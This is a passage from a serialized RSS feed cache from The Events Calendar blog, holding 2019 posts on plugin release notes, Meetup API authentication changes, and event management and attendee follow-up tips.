4.9.6</a></li>\\n<li><a href=\\\"#not-updated\\\">Not Updated This Release</a></li>\\n</ul>\\n<hr />\\n<h3 id=\\\"tec\\\">The Events Calendar 4.9.6</h3>\\n<ul>\\n<li><strong>Tweak</strong> &#8211; Update Event Aggregator to include compatibility with new Meetup API requirements &#8211; <a href=\\\"https://theeventscalendar.com/meetup-api-changes/\\\">Find out more&#8230;</a></li>\\n<li><strong>Language</strong> &#8211; 5 new strings added, 120 updated, 5 fuzzied, and 10 obsoleted</li>\\n</ul>\\n<hr />\\n<h3 id=\\\"not-updated\\\">Not Updated This Release</h3>\\n<p>The following plugins have <em>not</em> been updated this release and will remain at the version numbers specified here:</p>\\n<ul>\\n<li><a href=\\\"https://wordpress.org/plugins/advanced-post-manager/\\\">Advanced Post Manager</a> 4.5</li>\\n<li><a href=\\\"https://theeventscalendar.com/product/wordpress-community-events/\\\">Community Events</a> 4.6.3</li>\\n<li><a href=\\\"https://theeventscalendar.com/product/community-tickets/\\\">Community Tickets</a> 4.6.3</li>\\n<li><a href=\\\"https://theeventscalendar.com/product/wordpress-event-tickets/\\\" data-ytta-id=\\\"-\\\">Event Tickets</a> 4.10.6.2</li>\\n<li><a href=\\\"https://theeventscalendar.com/product/wordpress-event-tickets-plus/\\\" data-ytta-id=\\\"-\\\">Event Tickets Plus</a> 4.10.5.1</li>\\n<li><a href=\\\"https://theeventscalendar.com/product/wordpress-eventbrite-tickets/\\\">Eventbrite Tickets</a> 4.6.2</li>\\n<li><a href=\\\"https://theeventscalendar.com/product/wordpress-events-calendar-pro/\\\">Events Calendar Pro</a> 4.9.5</li>\\n<li><a href=\\\"https://theeventscalendar.com/product/wordpress-events-filterbar/\\\">Filter Bar</a> 4.8.1</li>\\n<li><a href=\\\"https://wordpress.org/plugins/GigPress\\\">GigPress</a> 2.3.23</li>\\n<li><a href=\\\"https://wordpress.org/plugins/image-widget/\\\">Image Widget</a> 4.4.7</li>\\n<li><a href=\\\"https://theeventscalendar.com/product/wordpress-image-widget-plus/\\\">Image Widget Plus</a> 1.0.3</li>\\n</ul>\\n<p>The post <a rel=\\\"nofollow\\\" href=\\\"https://theeventscalendar.com/announcing-the-events-calendar-4-9-6/\\\">Announcing The Events Calendar 4.9.6</a> appeared first on <a rel=\\\"nofollow\\\" href=\\\"https://theeventscalendar.com\\\">The Events Calendar</a>.</p>\\n\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}}}}i:6;a:6:{s:4:\\\"data\\\";s:48:\\\"\\n		\\n		\\n				\\n		\\n				\\n\\n		\\n				\\n								\\n										\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";s:5:\\\"child\\\";a:3:{s:0:\\\"\\\";a:6:{s:5:\\\"title\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:18:\\\"Meetup API changes\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}s:4:\\\"link\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:49:\\\"https://theeventscalendar.com/meetup-api-changes/\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}s:7:\\\"pubDate\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:31:\\\"Thu, 08 Aug 2019 17:09:48 +0000\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}s:8:\\\"category\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:10:\\\"Lifestream\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}s:4:\\\"guid\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:40:\\\"https://theeventscalendar.com/?p=1849126\\\";s:7:\\\"attribs\\\";a:1:{s:0:\\\"\\\";a:1:{s:11:\\\"isPermaLink\\\";s:5:\\\"false\\\";}}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}s:11:\\\"description\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:591:\\\"<p>Meetup.com recently announced changes to their API that will impact anyone importing Meetup data. To make sure that you can continue importing events, we&#8217;ve updated Event Aggregator to work with Meetup&#8217;s new system. Previously, Event Aggregator users connected to Meetup.com via an API key. With the new system, that connection is made through OAuth 2.&#8230;</p>\\n<p>The post <a rel=\\\"nofollow\\\" href=\\\"https://theeventscalendar.com/meetup-api-changes/\\\">Meetup API changes</a> appeared first on <a rel=\\\"nofollow\\\" href=\\\"https://theeventscalendar.com\\\">The Events Calendar</a>.</p>\\n\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}}s:32:\\\"http://purl.org/dc/elements/1.1/\\\";a:1:{s:7:\\\"creator\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:4:\\\"Leah\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}}s:40:\\\"http://purl.org/rss/1.0/modules/content/\\\";a:1:{s:7:\\\"encoded\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:1654:\\\"<p>Meetup.com recently announced changes to their API that will impact anyone importing Meetup data. To make sure that you can continue importing events, we&#8217;ve updated Event Aggregator to work with Meetup&#8217;s new system.</p>\\n<p>Previously, Event Aggregator users connected to Meetup.com via an API key. With the new system, that connection is made through <a href=\\\"https://www.meetup.com/meetup_api/auth/#oauth2\\\">OAuth 2</a>. Happily, linking your WordPress site to Meetup.com will be just as easy as it was before- the difference is all behind the scenes.</p>\\n<p><strong>To continue importing Meetup events with Event Aggregator,</strong> <strong>you&#8217;ll need to update to the latest version of The Events Calendar (4.9.6)</strong>. Once you&#8217;ve got the new version you&#8217;ll be able to re-establish your connection to your Meetup account from Events &#8211;&gt; Settings &#8211;&gt; APIs or from the EA Import screen.</p>\\n<p>On August 15, Meetup.com will no longer support connections through the old API keys. Between now and then they should continue to work, but our testing shows that those imports are extremely slow. After August 15, sites connected through the API key will no longer be able to import from Meetup through manual or scheduled imports. The best plan for your site is to update to the new version of TEC and re-connect to Meetup.com as soon as possible.</p>\\n<p>Happy importing!</p>\\n<p>&nbsp;</p>\\n<p>The post <a rel=\\\"nofollow\\\" href=\\\"https://theeventscalendar.com/meetup-api-changes/\\\">Meetup API changes</a> appeared first on <a rel=\\\"nofollow\\\" href=\\\"https://theeventscalendar.com\\\">The Events Calendar</a>.</p>\\n\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}}}}i:7;a:6:{s:4:\\\"data\\\";s:54:\\\"\\n		\\n		\\n				\\n		\\n				\\n		\\n		\\n\\n		\\n				\\n								\\n										\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";s:5:\\\"child\\\";a:3:{s:0:\\\"\\\";a:6:{s:5:\\\"title\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:43:\\\"4 Ways to Engage Attendees After Your Event\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}s:4:\\\"link\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:74:\\\"https://theeventscalendar.com/4-ways-to-engage-attendees-after-your-event/\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}s:7:\\\"pubDate\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:31:\\\"Wed, 07 Aug 2019 15:00:46 +0000\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}s:8:\\\"category\\\";a:3:{i:0;a:5:{s:4:\\\"data\\\";s:8:\\\"Articles\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}i:1;a:5:{s:4:\\\"data\\\";s:13:\\\"communication\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}i:2;a:5:{s:4:\\\"data\\\";s:15:\\\"event marketing\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}s:4:\\\"guid\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:40:\\\"https://theeventscalendar.com/?p=1846947\\\";s:7:\\\"attribs\\\";a:1:{s:0:\\\"\\\";a:1:{s:11:\\\"isPermaLink\\\";s:5:\\\"false\\\";}}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}s:11:\\\"description\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:609:\\\"<p>Your event has come and gone, but there’s still one crucial step left in the event management lifecycle: Follow-up. If you skip out on connecting with attendees after the event, you’ll sacrifice a valuable opportunity to engage with your attendees, build loyalty, and even drum up excitement for your next event. A little bit of&#8230;</p>\\n<p>The post <a rel=\\\"nofollow\\\" href=\\\"https://theeventscalendar.com/4-ways-to-engage-attendees-after-your-event/\\\">4 Ways to Engage Attendees After Your Event</a> appeared first on <a rel=\\\"nofollow\\\" href=\\\"https://theeventscalendar.com\\\">The Events Calendar</a>.</p>\\n\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}}s:32:\\\"http://purl.org/dc/elements/1.1/\\\";a:1:{s:7:\\\"creator\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:6:\\\"Lauren\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}}s:40:\\\"http://purl.org/rss/1.0/modules/content/\\\";a:1:{s:7:\\\"encoded\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:4530:\\\"<p>Your event has come and gone, but there’s still one crucial step left in the event management lifecycle: Follow-up.</p>\\n<p>If you skip out on connecting with attendees after the event, you’ll sacrifice a valuable opportunity to engage with your attendees, build loyalty, and even drum up excitement for your next event. <strong>A little bit of follow-up can go a long way, and it doesn’t need to require a ton of effort on your part</strong>—just some advance planning to ensure you hit all of the important touchpoints.</p>\\n<p>Wondering where to start? We’ve got you covered. Here are four tips on how to keep attendees engaged after the event:</p>\\n<h3>Send a thank-you email</h3>\\n<p>That childhood lesson to always say “thank you&#8221; also applies to good event management. For event managers, saying thanks isn’t just the polite thing to do—it also makes good business sense. <strong>Thank-you emails enjoy a surprisingly high open rate of around 42 percent</strong>, <a href=\\\"https://www.eventbrite.com/blog/event-email-examples-ds00/\\\">according to data cited by Eventbrite</a>. A thank-you email to your attendees adds a personal touch that can also help show the human side of your brand. Always send a thank-you email to keep attendees engaged with your brand even after they return home.</p>\\n<div class=\\\"pro-tip\\\"><strong>Pro tip:</strong> With <a href=\\\"https://theeventscalendar.com/product/promoter/\\\">Promoter</a>, you can automate your email touchpoints and easily schedule emails at every stage of your event lifecycle, from new event announcements to post-event follow-up.</div>\\n<h3>Share photos, videos, quotes and other content from your event</h3>\\n<p>If your <a href=\\\"https://theeventscalendar.com/critical-attendee-emails-for-every-event/\\\">thank-you email</a> is looking sparse, liven it up by including a link to event photos, video clips, or quotes from attendees. People love to spot themselves in photos, so be sure to post your red carpet pics and candid shots from the event across social media. Photos, videos, and testimonials that convey the spirit of the event are also excellent tools for generating a little bit of healthy <abbr title=\\\"Fear of Missing Out\\\">FOMO</abbr> among the people who couldn’t make it to your event; after they see what they missed out on, you can be sure they won’t miss the next one.</p>\\n<h3>Offer exclusive pre-registration perks for attendees</h3>\\n<p>Give your attendees the <abbr>VIP</abbr> treatment at your next event. This is another way to show gratitude, and it also can build loyalty for your brand and your events. Offer perks to recent attendees who register early for your next event. Discounts are always enticing, but so are upgraded ticket tiers and special access that’s only available to recent attendees.</p>\\n<p>Timing is key here: Don’t bombard attendees with an aggressive sales pitch for your next soiree before your current event is even over, but don’t wait *too* long to start the conversation about your next event. Encourage people to register for upcoming events while the great experience at your last event is still fresh in their minds.</p>\\n<h3>Gather feedback and find ways to improve</h3>\\n<p>Your attendees are a treasure trove of valuable data. Don’t miss the chance to ask them for feedback on your latest event: Ask them to fill out an exit survey before they leave the event, send an email with a survey link a day or two later, or try a combination of both tactics.</p>\\n<p>Ask attendees for their honest opinions about the food, music, <a href=\\\"https://theeventscalendar.com/venue-marketing-promote-events-sell-tickets/\\\">venue</a>, programming, and anything else that can help you plan an even better event the next time around. Everyone has an opinion, and by asking for your attendees’ two cents, you’ll demonstrate that you value theirs. Plus, the feedback you gather can provide inspiration and help you tweak your upcoming events, which will translate into even more happy eventgoers in the future.</p>\\n<hr />\\n<p>Looking for more ways to streamline your event management to-do list? We’ve got your back with a <a href=\\\"https://theeventscalendar.com/products/\\\">full suite of products</a> that help you make the most of your events.</p>\\n<p>The post <a rel=\\\"nofollow\\\" href=\\\"https://theeventscalendar.com/4-ways-to-engage-attendees-after-your-event/\\\">4 Ways to Engage Attendees After Your Event</a> appeared first on <a rel=\\\"nofollow\\\" href=\\\"https://theeventscalendar.com\\\">The Events Calendar</a>.</p>\\n\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}}}}i:8;a:6:{s:4:\\\"data\\\";s:51:\\\"\\n		\\n		\\n				\\n		\\n				\\n		\\n\\n		\\n				\\n								\\n										\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";s:5:\\\"child\\\";a:3:{s:0:\\\"\\\";a:6:{s:5:\\\"title\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:54:\\\"The Only Event Management Checklist You’ll Ever Need\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}s:4:\\\"link\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:82:\\\"https://theeventscalendar.com/the-only-event-management-checklist-youll-ever-need/\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}s:7:\\\"pubDate\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:31:\\\"Tue, 06 Aug 2019 19:39:38 +0000\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}s:8:\\\"category\\\";a:2:{i:0;a:5:{s:4:\\\"data\\\";s:8:\\\"Articles\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}i:1;a:5:{s:4:\\\"data\\\";s:16:\\\"event management\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}s:4:\\\"guid\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:40:\\\"https://theeventscalendar.com/?p=1845357\\\";s:7:\\\"attribs\\\";a:1:{s:0:\\\"\\\";a:1:{s:11:\\\"isPermaLink\\\";s:5:\\\"false\\\";}}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}s:11:\\\"description\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:641:\\\"<p>To most people, “events&#8221; is just another way of saying “cool stuff to do&#8221;: concerts, birthday parties, nature walks, book club meetings, Independence Day parades, you name it. But for event planners and promoters, we know that event management encompasses much more than just what happens on the day of your soiree. Leading up to&#8230;</p>\\n<p>The post <a rel=\\\"nofollow\\\" href=\\\"https://theeventscalendar.com/the-only-event-management-checklist-youll-ever-need/\\\">The Only Event Management Checklist You’ll Ever Need</a> appeared first on <a rel=\\\"nofollow\\\" href=\\\"https://theeventscalendar.com\\\">The Events Calendar</a>.</p>\\n\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}}s:32:\\\"http://purl.org/dc/elements/1.1/\\\";a:1:{s:7:\\\"creator\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:6:\\\"Lauren\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}}s:40:\\\"http://purl.org/rss/1.0/modules/content/\\\";a:1:{s:7:\\\"encoded\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:10263:\\\"<p>To most people, “events&#8221; is just another way of saying “cool stuff to do&#8221;: concerts, birthday parties, nature walks, book club meetings, Independence Day parades, you name it.</p>\\n<p>But for event planners and promoters, we know that event management encompasses much more than just what happens on the day of your soiree. Leading up to the event, there’s promotion, ticketing, and planning to sort out, not to mention the time you’ll spend following up with attendees afterwards.</p>\\n<p>Sound like a lot to organize? It is! So today, we’ll break down the entire event life-cycle into an easy-peasy checklist that will help you stay organized before, during, and after your next event.</p>\\n<p><a class=\\\"btn-filled\\\" href=\\\"https://s3.theeventscalendar.com/uploads/2019/07/event-management-checklist.pdf\\\">Print Checklist</a></p>\\n<hr />\\n<h2>Define your event strategy</h2>\\n<p>You already have a great idea for your event. Now, it’s time to take the first steps toward strategically planning that event.</p>\\n<p><input id=\\\"planning-1\\\" type=\\\"checkbox\\\" /><label for=\\\"planning-1\\\">Why are you hosting this event? What’s your goal?</label></p>\\n<p>Sometimes, events are simply about creating connection, but most of the time, we also have organizational goals tied to them: Are we hoping to build up a community? To advance a particular agenda? Drive more <a href=\\\"https://theeventscalendar.com/quick-tips-sell-more-event-tickets/\\\">ticket sales</a>? Understanding the “why&#8221; behind your event will help you build a great event strategy.</p>\\n<p><input id=\\\"planning-2\\\" type=\\\"checkbox\\\" /><label for=\\\"planning-2\\\">Who is the event for?</label></p>\\n<p>Before you get too deep in the planning and prep, define your audience. What are their interests? How will they share this experience with their peers? Thinking through these questions will help you stay focused as you map out the entire attendee/customer journey.</p>\\n<p><input id=\\\"planning-3\\\" type=\\\"checkbox\\\" /><label for=\\\"planning-3\\\">What will people be doing when they attend?</label></p>\\n<p>What does the event programming or “run of show&#8221; look like? **Are you hoping to teach folks something new, offer classes or workshops, or simply allow space for connection and socialization? Will people be eating or drinking? Maybe a little bit of everything? Create a focused event program for a meaningful experience.</p>\\n<p><input id=\\\"planning-4\\\" type=\\\"checkbox\\\" /><label for=\\\"planning-4\\\">Why will they choose this event over others?</label></p>\\n<p>What makes your event stand out in a crowded calendar? Have you created a <a href=\\\"https://theeventscalendar.com/anatomy-of-an-awesome-event-page/\\\">compelling event listing</a> that includes all the important details *and* makes your event irresistible to prospective attendees?</p>\\n<p><input id=\\\"planning-5\\\" type=\\\"checkbox\\\" /><label for=\\\"planning-5\\\">Book a <a href=\\\"https://theeventscalendar.com/venue-marketing-promote-events-sell-tickets/\\\">venue</a></label> (or don’t, if you’re hosting a virtual event). If you’re hosting an in-person event, be sure to consider transportation logistics and how your attendees will get there.</p>\\n<hr />\\n<h2>Start promoting your event</h2>\\n<p>You’ve laid the groundwork for your event. Now, it’s time to promote it to your prospective attendees.</p>\\n<p><input id=\\\"promote-2\\\" type=\\\"checkbox\\\" /><label for=\\\"promote-2\\\">Organic promotion</label></p>\\n<p>This includes things like social media posts, event listings on your <a href=\\\"https://theeventscalendar.com/product/wordpress-events-calendar/\\\">website events calendar</a> and on third-party calendar sites, <a href=\\\"https://theeventscalendar.com/4-ways-to-get-more-people-at-your-events-for-free/\\\">reaching out to past attendees</a>, and <a href=\\\"https://theeventscalendar.com/4-ways-the-pros-use-seo-for-events/\\\">using search engine optimization</a> (<abbr>SEO</abbr>) to help prospective attendees to find your events while searching the web. (Still looking for the perfect calendar for your website? Hey, <a href=\\\"https://theeventscalendar.com/product/wordpress-events-calendar/\\\">we can help with that</a>!)</p>\\n<p><input id=\\\"promote-3\\\" type=\\\"checkbox\\\" /><label for=\\\"promote-3\\\">Paid promotion</label></p>\\n<p>If it’s in your budget, you can include promoted social media posts, sponsorships at similar events, or ads in websites or media outlets.</p>\\n<p><input id=\\\"promote-4\\\" type=\\\"checkbox\\\" /><label for=\\\"promote-4\\\">Send a “thanks for registering&#8221; email</label></p>\\n<p>Do this as soon as attendees register or RSVP, and be sure to include important details like the event date and time, address, and parking and transportation info.</p>\\n<p><input id=\\\"promote-5\\\" type=\\\"checkbox\\\" /><label for=\\\"promote-5\\\">Plan a series of “get ready&#8221; touchpoints with attendees via email and social media</label></p>\\n<p>Build excitement by sharing photos and videos from previous events and releasing new event details, like just-added performers or featured speakers, as new information becomes available.</p>\\n<p><input id=\\\"promote-6\\\" type=\\\"checkbox\\\" /><label for=\\\"promote-6\\\">Send event reminders as your event approaches</label></p>\\n<p>Emails and social media posts can give attendees a friendly nudge when the event is one week away, one day away, or happening today.</p>\\n<div class=\\\"pro-tip\\\"><strong>Pro tip:</strong> Use a tool like <a href=\\\"https://theeventscalendar.com/product/promoter/\\\">Promoter</a> to streamline your email marketing efforts, from new event alerts to post-event follow-ups.</div>\\n<hr />\\n<h2>Sales and Ticketing</h2>\\n<p>If you’re selling tickets for your event, follow these pointers for a seamless sales experience for both you and your attendees.</p>\\n<p><input id=\\\"promote-6\\\" type=\\\"checkbox\\\" /><label for=\\\"promote-6\\\">Decide on ticket tiers, if you have them.</label></p>\\n<p>Are you selling just one ticket type, all at the same price? Or will you be selling tickets that offer special access or VIP perks? Decide which perks each ticket level will offer and how much each level will cost.</p>\\n<p><input id=\\\"promote-6\\\" type=\\\"checkbox\\\" /><label for=\\\"promote-6\\\">Use a ticket distribution system.</label></p>\\n<p>Planning to sell your tickets online? You need a system to help you not just with the sales component, but also with distribution, whether attendees will receive their tickets via email or snail mail. Luckily, tools like <a href=\\\"https://theeventscalendar.com/product/wordpress-event-tickets/\\\">Event Tickets</a> make it easy for event planners to manage ticket sales and distribution. If you need extra bells and whistles, like custom registration fields on your ticket sales page or an app to facilitate ticketing and check-in on the day of your event, opt for a tool like <a href=\\\"https://theeventscalendar.com/product/wordpress-event-tickets-plus/\\\">Event Tickets Plus</a> for a comprehensive solution.</p>\\n<hr />\\n<h2>Day-of Logistics</h2>\\n<p>Ensure everything runs smoothly on the day of your event by hammering out these details ahead of time.</p>\\n<p><input id=\\\"promote-6\\\" type=\\\"checkbox\\\" /><label for=\\\"promote-6\\\">Make a plan for check-in and registration.</label></p>\\n<p>Decide if you need to set up a booth or bring on <a href=\\\"https://theeventscalendar.com/finding-event-volunteers/\\\">volunteers</a> to help run check-in and registration. Will you cross guest’s names off an old-fashioned paper list as they arrive? Or will you use <a href=\\\"https://support.theeventscalendar.com/668828-Using-QR-codes-with-Event-Tickets-Plus\\\">a check-in app</a> to quickly scan tickets and avoid long lines?</p>\\n<p><input id=\\\"promote-6\\\" type=\\\"checkbox\\\" /><label for=\\\"promote-6\\\">Align your team and run through the what-ifs.</label></p>\\n<p>Whether you’re a skeleton crew or a team of 100 staff members and volunteers, keep the entire team informed leading up to your event. Assign clear roles so that each person understands their duties, create a schedule outlining where each team member will be stationed, and work out a contingency plan, just in case: If you run out of appetizers, is there a grocery store nearby where you can grab snacks? Do you have back-up <abbr>HDMI</abbr> cords and speakers if you run into tech issues? A little bit of advance preparation will go a long way in ensuring your event is a success.</p>\\n<hr />\\n<h2>Post-event audience engagement</h2>\\n<p>Your event went off without a hitch, and your attendees had a blast—nicely done! But your work isn’t over quite yet. Follow-up communication is critical for gathering feedback and attracting attendees to future events.</p>\\n<p><input id=\\\"promote-6\\\" type=\\\"checkbox\\\" /><label for=\\\"promote-6\\\">Send a “thank-you&#8221; message to attendees.</label></p>\\n<p>Everyone likes to feel appreciated, plus, <a href=\\\"https://theeventscalendar.com/critical-attendee-emails-for-every-event/\\\">a thank-you email</a> provides an excellent opportunity to solicit feedback from your guests.</p>\\n<p><input id=\\\"promote-6\\\" type=\\\"checkbox\\\" /><label for=\\\"promote-6\\\">Send a message to people who couldn’t make it.</label></p>\\n<p>Send over a few highlights from your event to generate a little bit of healthy <abbr title=\\\"Fear of Missing Out\\\">FOMO</abbr> among people who couldn’t make it to your event and start building interest and excitement now for your next event.</p>\\n<p><input id=\\\"promote-6\\\" type=\\\"checkbox\\\" /><label for=\\\"promote-6\\\">Take stock of what you learned and what you’ll do differently next time.</label></p>\\n<hr />\\n<p>Every event is a learning experience. Reflect on what went well and what you’d like to improve, and make a few internal notes for your next event.</p>\\n<p>No matter which stage you’re at in the event lifecycle, The Events Calendar family of WordPress tools is here to help. Questions about our products? Not sure which ones are right for you? Give us a shout and we’ll be happy to help!</p>\\n<p><a class=\\\"btn-filled\\\" href=\\\"https://s3.theeventscalendar.com/uploads/2019/07/event-management-checklist.pdf\\\">Print Checklist</a></p>\\n<p>The post <a rel=\\\"nofollow\\\" href=\\\"https://theeventscalendar.com/the-only-event-management-checklist-youll-ever-need/\\\">The Only Event Management Checklist You’ll Ever Need</a> appeared first on <a rel=\\\"nofollow\\\" href=\\\"https://theeventscalendar.com\\\">The Events Calendar</a>.</p>\\n\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}}}}i:9;a:6:{s:4:\\\"data\\\";s:51:\\\"\\n		\\n		\\n				\\n		\\n				\\n		\\n\\n		\\n				\\n								\\n										\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";s:5:\\\"child\\\";a:3:{s:0:\\\"\\\";a:6:{s:5:\\\"title\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:34:\\\"4 Ways the Pros Use SEO for Events\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}s:4:\\\"link\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:65:\\\"https://theeventscalendar.com/4-ways-the-pros-use-seo-for-events/\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}s:7:\\\"pubDate\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:31:\\\"Mon, 29 Jul 2019 16:00:09 